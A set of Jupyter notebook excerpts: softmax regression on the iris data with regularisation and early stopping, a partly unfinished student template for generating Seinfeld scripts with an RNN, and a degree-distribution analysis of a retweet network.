return encoded_target
encoded_target = one_hot_encoder(iris_train_result)
np.unique(encoded_target, axis=0)
```
### Fucntions for the Softmax scores and probabilities of training set:
```
def softmax_scores_func(data, theta):
return data.dot(theta)
def softmax_probability_func(softmax_scores):
return np.exp(softmax_scores)/np.sum(np.exp(softmax_scores), axis=1, keepdims=True)
```
### Finding Optimum $\vec{\theta}^{\,}_k$, where k $\epsilon$ (0, K), for K = no.of classes:
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
for validation in range(n_validations):
X_train, y_train, X_valid, y_valid = train_test_split(X, y, test_ratio=validation_ratio)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
entropy_loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
if iteration % 500 == 0:
print(iteration,' ', f'{loss:.5f}')
gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
softmax_theta = softmax_theta - alpha * gradient
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.1, validation_ratio=0.4, n_validations=5)
print(softmax_theta)
print(validation_accuracy)
print(validation)
def predict(X, theta):
predictions = X.dot(theta)
return np.argmax(predictions, axis=1)
final_predictions = predict(iris_test, softmax_theta)
final_predictions[:5]
final_accuracy = np.sum(final_predictions == iris_test_result)/len(iris_test_result)
final_accuracy
```
### Adding Regularization to the $Optimum$ $Theta$ $Func.$
We will add $l_2$ loss to the model, hopefully it might help us achieve better result!
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, loss=True, reg_para=0.1, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
# Handles all the loss parameters
loss_flag = int(loss)
for validation in range(n_validations):
X_train, y_train, X_valid, y_valid = train_test_split(X, y, test_ratio=validation_ratio)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
# Since, the total loss is a summation of two terms, we can separate them
entropy_loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
l2_loss = (loss_flag)*((1/2) * np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
if iteration % 500 == 0:
print(iteration,' ', f'{total_loss:.5f}')
# Since, the total gradient is a summation of two terms, we can separate them
entropy_gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
l2_gradient = (loss_flag) * (np.r_[np.zeros([1, n_classes]), reg_para * softmax_theta[1:]])
softmax_theta = softmax_theta - alpha * (entropy_gradient + l2_gradient)
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.1, validation_ratio=0.1, n_validations=5, loss=True)
print(softmax_theta)
print(validation_accuracy)
print(validation)
regularized_predictions = predict(iris_test, softmax_theta)
regularized_predictions[:5]
regularized_accuracy = np.mean(regularized_predictions == iris_test_result)
regularized_accuracy
```
The accuracy went down instead of going up, but we know the reason why.<br><br>
If you look at the loss values of each validation you will see that after a some iterations the loss values start to increase. This is because the model starts to overfit the data. And, hence as result our final accuracy goes down.<br><br>
*To solve this we will use ***EARLY-STOPPING*** Method*
### Adding Early-Stopping Method to $Regularized$ $Optimum$ $Theta$ $Func$.
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, loss=True, reg_para=0.1, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
# Handles all the loss parameters
loss_flag = int(loss)
for validation in range(n_validations):
best_loss = np.infty
X_train, y_train, X_valid, y_valid = train_test_split(X, y)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
# Since, the total loss is a summation of two terms, we can separate them
entropy_loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
l2_loss = (loss_flag)*((1/2) * np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
# Since, the total gradient is a summation of two terms, we can separate them
entropy_gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
l2_gradient = (loss_flag) * (np.r_[np.zeros([1, n_classes]), reg_para * softmax_theta[1:]])
softmax_theta = softmax_theta - alpha * (entropy_gradient + l2_gradient)
# Early-Stop condition
softmax_scores = softmax_scores_func(X_valid, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
entropy_loss = -(np.mean(np.sum(y_valid_one_hot * np.log(softmax_proba + epsilon), axis=1)))
l2_loss = (loss_flag)*((1/2)*np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
if iteration % 500 == 0:
print(f'{iteration} -> {total_loss:.5f}')
if total_loss < best_loss:
best_loss = total_loss
else:
print(f'{iteration - 1} -> {best_loss:.5f} Best Loss!')
print(f'{iteration} -> {total_loss:.5f} Early Stopping!')
break
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}\n')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.07, validation_ratio=0.2, n_validations=5, loss=False, reg_para=0.1)
print(softmax_theta)
print(validation_accuracy)
print(validation)
early_stopping_predictions = predict(iris_test, softmax_theta)
early_stopping_predictions[:5]
early_stopping_accuracy = np.mean(early_stopping_predictions == iris_test_result)
early_stopping_accuracy
```
| github_jupyter |
# TV Script Generation
In this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new ,"fake" TV script, based on patterns it recognizes in this training data.
## Get the Data
The data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text.
>* As a first step, we'll load in this data and look at some samples.
* Then, you'll be tasked with defining and training an RNN to generate a new script!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# load in data
import helper
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
```
## Explore the Data
Play around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\n`.
```
view_line_range = (0, 10)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import numpy as np
print('Dataset Stats')
print('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))
lines = text.split('\n')
print('Number of lines: {}'.format(len(lines)))
word_count_line = [len(line.split()) for line in lines]
print('Average number of words in each line: {}'.format(np.average(word_count_line)))
print()
print('The lines {} to {}:'.format(*view_line_range))
print('\n'.join(text.split('\n')[view_line_range[0]:view_line_range[1]]))
```
---
## Implement Pre-processing Functions
The first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:
- Lookup Table
- Tokenize Punctuation
### Lookup Table
To create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:
- Dictionary to go from the words to an id, we'll call `vocab_to_int`
- Dictionary to go from the id to word, we'll call `int_to_vocab`
Return these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`
```
import problem_unittests as tests
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
# TODO: Implement Function
int_to_vocab = dict(enumerate(list(set(text)))) # Remove duplicates before enumerating
vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
return (vocab_to_int, int_to_vocab)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_create_lookup_tables(create_lookup_tables)
```
### Tokenize Punctuation
We'll be splitting the script into a word array using spaces as delimiters. However, punctuations like periods and exclamation marks can create multiple ids for the same word. For example, "bye" and "bye!" would generate two different word ids.
Implement the function `token_lookup` to return a dict that will be used to tokenize symbols like "!" into "||Exclamation_Mark||". Create a dictionary for the following symbols where the symbol is the key and value is the token:
- Period ( **.** )
- Comma ( **,** )
- Quotation Mark ( **"** )
- Semicolon ( **;** )
- Exclamation mark ( **!** )
- Question mark ( **?** )
- Left Parentheses ( **(** )
- Right Parentheses ( **)** )
- Dash ( **-** )
- Return ( **\n** )
This dictionary will be used to tokenize the symbols and add the delimiter (space) around it. This separates each symbols as its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused as a word; for example, instead of using the value "dash", try using something like "||dash||".
```
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
# TODO: Implement Function
return {
".": "__Period__",
",": "__Comma__",
"\"": "__QuotationMark__",
";": "__Semicolon__",
"!": "__ExclamationMark__",
"?": "__QuestionMark__",
"(": "__LeftParentheses__",
")": "__RightParentheses__",
"-": "__Dash__",
"\n": "__Return__"
}
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_tokenize(token_lookup)
```
## Pre-process all the data and save it
Running the code cell below will pre-process all the data and save it to file. You're encouraged to look at the code for `preprocess_and_save_data` in the `helpers.py` file to see what it's doing in detail, but you do not need to change this code.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# pre-process training data
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
```
# Check Point
This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import helper
import problem_unittests as tests
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
```
## Build the Neural Network
In this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.
### Check Access to GPU
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
```
## Input
Let's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.
You can create data with TensorDataset by passing in feature and target tensors. Then create a DataLoader as usual.
```
data = TensorDataset(feature_tensors, target_tensors)
data_loader = torch.utils.data.DataLoader(data,
batch_size=batch_size)
```
### Batching
Implement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.
>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.
For example, say we have these as input:
```
words = [1, 2, 3, 4, 5, 6, 7]
sequence_length = 4
```
Your first `feature_tensor` should contain the values:
```
[1, 2, 3, 4]
```
And the corresponding `target_tensor` should just be the next "word"/tokenized word value:
```
5
```
This should continue with the second `feature_tensor`, `target_tensor` being:
```
[2, 3, 4, 5] # features
6 # target
```
```
from torch.utils.data import TensorDataset, DataLoader
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
feature_tensors = torch.tensor(np.reshape(words, (sequence_length, batch_size)))
target_tensors = torch.tensor(words[:sequence_length])
data = TensorDataset(feature_tensors, target_tensors)
data_loader = torch.utils.data.DataLoader(data, batch_size=batch_size)
return data_loader
# there is no test for this function, but you are encouraged to create
# print statements and tests of your own
```
### Test your dataloader
You'll have to modify this code to test a batching function, but it should look fairly similar.
Below, we're generating some test text data and defining a dataloader using the function you defined, above. Then, we are getting some sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.
Your code should return something like the following (likely in a different order, if you shuffled your data):
```
torch.Size([10, 5])
tensor([[ 28, 29, 30, 31, 32],
[ 21, 22, 23, 24, 25],
[ 17, 18, 19, 20, 21],
[ 34, 35, 36, 37, 38],
[ 11, 12, 13, 14, 15],
[ 23, 24, 25, 26, 27],
[ 6, 7, 8, 9, 10],
[ 38, 39, 40, 41, 42],
[ 25, 26, 27, 28, 29],
[ 7, 8, 9, 10, 11]])
torch.Size([10])
tensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])
```
### Sizes
Your sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10).
### Values
You should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.
```
# test dataloader
test_text = range(50)
t_loader = batch_data(test_text, sequence_length=5, batch_size=10)
data_iter = iter(t_loader)
sample_x, sample_y = data_iter.next()
print(sample_x.shape)
print(sample_x)
print()
print(sample_y.shape)
print(sample_y)
words = [11, 12, 13, 14, 15, 16, 17, 18]
sequence_length = 2
t_loader = batch_data(words, sequence_length, 4)
data_iter = iter(t_loader)
sample_x, sample_y = data_iter.next()
print()
print('sample_x.shape:', sample_x.shape)
print('sample_x:', sample_x)
print()
print('sample_y.shape', sample_y.shape)
print('sample_y:', sample_y)
```
---
## Build the Neural Network
Implement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:
- `__init__` - The initialize function.
- `init_hidden` - The initialization function for an LSTM/GRU hidden state
- `forward` - Forward propagation function.
The initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.
**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.
### Hints
1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer, you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`
2. You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:
```
# reshape into (batch_size, seq_length, output_size)
output = output.view(batch_size, -1, self.output_size)
# get last batch
out = output[:, -1]
```
```
import torch.nn as nn
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# TODO: Implement function
# set class variables
# define model layers
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
# TODO: Implement function
# return one batch of output word scores and the hidden state
return None, None
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
# initialize hidden state with zero weights, and move to GPU if available
return None
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_rnn(RNN, train_on_gpu)
```
### Define forward and backpropagation
Use the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:
```
loss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)
```
And it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.
**If a GPU is available, you should move your data to that GPU device, here.**
```
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param rnn: The PyTorch Module that holds the neural network
:param optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# TODO: Implement Function
# move data to GPU, if available
# perform backpropagation and optimization
# return the loss over a batch and the hidden state produced by our model
return None, None
# Note that these tests aren't completely extensive.
# they are here to act as general checks on the expected outputs of your functions
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)
```
## Neural Network Training
With the structure of the network complete and data ready to be fed in the neural network, it's time to train it.
### Train Loop
The training loop is implemented for you in the `train_decoder` function. This function will train the network over all the batches for the number of epochs given. The model progress will be shown every number of batches. This number is set with the `show_every_n_batches` parameter. You'll set this parameter along with other parameters in the next section.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
```
### Hyperparameters
Set and train the neural network with the following parameters:
- Set `sequence_length` to the length of a sequence.
- Set `batch_size` to the batch size.
- Set `num_epochs` to the number of epochs to train for.
- Set `learning_rate` to the learning rate for an Adam optimizer.
- Set `vocab_size` to the number of unique tokens in our vocabulary.
- Set `output_size` to the desired size of the output.
- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.
- Set `hidden_dim` to the hidden dimension of your RNN.
- Set `n_layers` to the number of layers/cells in your RNN.
- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.
If the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.
```
# Data params
# Sequence Length
sequence_length = # of words in a sequence
# Batch Size
batch_size =
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
# Training parameters
# Number of Epochs
num_epochs =
# Learning Rate
learning_rate =
# Model parameters
# Vocab size
vocab_size =
# Output size
output_size =
# Embedding Dimension
embedding_dim =
# Hidden Dimension
hidden_dim =
# Number of RNN Layers
n_layers =
# Show stats for every n number of batches
show_every_n_batches = 500
```
### Train
In the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train.
> **You should aim for a loss less than 3.5.**
You should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./save/trained_rnn', trained_rnn)
print('Model Trained and Saved')
```
### Question: How did you decide on your model hyperparameters?
For example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?
**Answer:** (Write answer, here)
---
# Checkpoint
After running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
import helper
import problem_unittests as tests
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./save/trained_rnn')
```
## Generate TV Script
With the network trained and saved, you'll use it to generate a new, "fake" Seinfeld TV script in this section.
### Generate Text
To generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of puncuation tokens keys to puncuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
if(train_on_gpu):
current_seq = current_seq.cpu() # move to cpu
# the generated word becomes the next "current sequence" and the cycle can continue
if train_on_gpu:
current_seq = current_seq.cpu()
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
```
### Generate a New Script
It's time to generate the text. Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:
- "jerry"
- "elaine"
- "george"
- "kramer"
You can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)
```
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script)
```
#### Save your favorite scripts
Once you have a script that you like (or find interesting), save it to a text file!
```
# save script to a text file
f = open("generated_script_1.txt","w")
f.write(generated_script)
f.close()
```
# The TV Script is Not Perfect
It's ok if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue, here is one such example of a few generated lines.
### Example generated script
>jerry: what about me?
>
>jerry: i don't have to wait.
>
>kramer:(to the sales table)
>
>elaine:(to jerry) hey, look at this, i'm a good doctor.
>
>newman:(to elaine) you think i have no idea of this...
>
>elaine: oh, you better take the phone, and he was a little nervous.
>
>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.
>
>jerry: oh, yeah. i don't even know, i know.
>
>jerry:(to the phone) oh, i know.
>
>kramer:(laughing) you know...(to jerry) you don't know.
You can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally.
# Submitting This Project
When submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as "dlnd_tv_script_generation.ipynb" and save another copy as an HTML file by clicking "File" -> "Download as.."->"html". Include the "helper.py" and "problem_unittests.py" files in your submission. Once you download these files, compress them into one zip file for submission.
| github_jupyter |
```
import networkx as nx
import pandas as pd
import numpy as np
from statsmodels.distributions.empirical_distribution import ECDF
import matplotlib.pyplot as plt
from scipy.stats import poisson
import scipy.stats as stats
from scipy.spatial import distance
from dragsUtility import *
import json
import twitter
import numpy as np; np.random.seed(0)
import seaborn as sns; sns.set_theme()
df = pd.read_csv('Data/rutweet.csv')
graph = nx.from_pandas_edgelist(df, source="source", target="target", edge_attr="weight", create_using=nx.DiGraph)
```
# Preprocessing
Rimozione dei cappi
```
graph.remove_edges_from(nx.selfloop_edges(graph))
```
Cartoon Network
# Network info
```
print("Number of nodes {}".format(graph.order()))
print("Number of edges {}".format(graph.size()))
nx.is_directed_acyclic_graph(graph)
print("Density {}".format(nx.density(graph)))
```
## Degree Analysis
### In-Degree + Out-Degree = Degree
Media, mediana, deviazione standard, range interquartile, minimo e massimo sono dei buoni indici per riassumere la distribuzione.
```
degrees = list(dict(graph.degree(weight="weight")).values())
print('Mean degree: \t'+ str(np.mean(degrees)))
print('Standard deviation: ' + str(np.std(degrees)))
print('Median: ' + str(np.median(degrees)))
print('iqr: ' + str(np.quantile(degrees, 0.75) - np.quantile(degrees, 0.25)))
print('Min: ' + str(np.min(degrees)))
print('Max: ' + str(np.max(degrees)))
random_graph_erdos = nx.fast_gnp_random_graph(len(graph.nodes), nx.density(graph))
random_degrees = list(dict(random_graph_erdos.degree()).values())
cdf = ECDF(degrees)
x = np.unique(degrees)
y = cdf(x)
cdf_random = ECDF(random_degrees)
x_random = np.unique(random_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='o',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='D',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/DegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
```
### In-Degree
```
in_degrees_noitems = dict(graph.in_degree(weight='weight'))
in_degrees = list(in_degrees_noitems.values())
print('Mean degree: \t'+ str(np.mean(in_degrees)))
print('Standard deviation: ' + str(np.std(in_degrees)))
print('Median: ' + str(np.median(in_degrees)))
print('iqr: ' + str(np.quantile(in_degrees, 0.75) - np.quantile(in_degrees, 0.25)))
print('Min: ' + str(np.min(in_degrees)))
print('Max: ' + str(np.max(in_degrees)))
```
Il nodo con in-degree più alto è un partecipante?
```
pippo = dict(graph.in_degree(weight="weight"))
sortedPippo = {k: v for k, v in sorted(pippo.items(), key=lambda item: item[1], reverse=True)}
dragsUtility= DragsUtility()
dragsUtility.isaDrag(str(list(sortedPippo.keys())[0]))
random_digraph_erdos = nx.fast_gnp_random_graph(len(graph.nodes), nx.density(graph), directed=True)
random_in_degrees = list(dict(random_digraph_erdos.in_degree(weight="weight")).values())
cdf = ECDF(in_degrees)
x = np.unique(in_degrees)
y = cdf(x)
cdf_random = ECDF(random_in_degrees)
x_random = np.unique(random_in_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='o',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='D',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('In-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/InDegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
```
### Out-degree
```
out_degrees_dict = dict(graph.out_degree(weight="weight"))
out_degrees = list(out_degrees_dict.values())
print('Mean degree: \t'+ str(np.mean(out_degrees)))
